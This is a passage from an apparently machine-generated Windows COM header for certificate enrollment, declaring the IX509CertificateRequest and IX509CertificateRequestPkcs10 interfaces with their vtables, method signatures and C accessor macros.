            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestVtbl;

    interface IX509CertificateRequest
    {
        CONST_VTBL struct IX509CertificateRequestVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequest_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequest_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequest_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequest_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequest_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequest_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequest_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequest_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequest_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequest_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequest_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequest_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequest_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequest_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequest_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequest_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequest_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequest_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequest_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequest_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequest_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequest_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequest_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequest_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequest_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequest_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequest_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequest_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequest_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequest_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequest_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0076 */
/* [local] */ 

typedef 
enum Pkcs10AllowedSignatureTypes
    {
        AllowedKeySignature	= 0x1,
        AllowedNullSignature	= 0x2
    } 	Pkcs10AllowedSignatureTypes;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0076_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0076_v0_0_s_ifspec;

#ifndef __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab342-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromPrivateKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReuseKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OldCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Subject( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Subject( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspStatuses( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SmimeCapabilities( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawDataToBeSigned( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatuses( 
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10Vtbl;

    interface IX509CertificateRequestPkcs10
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

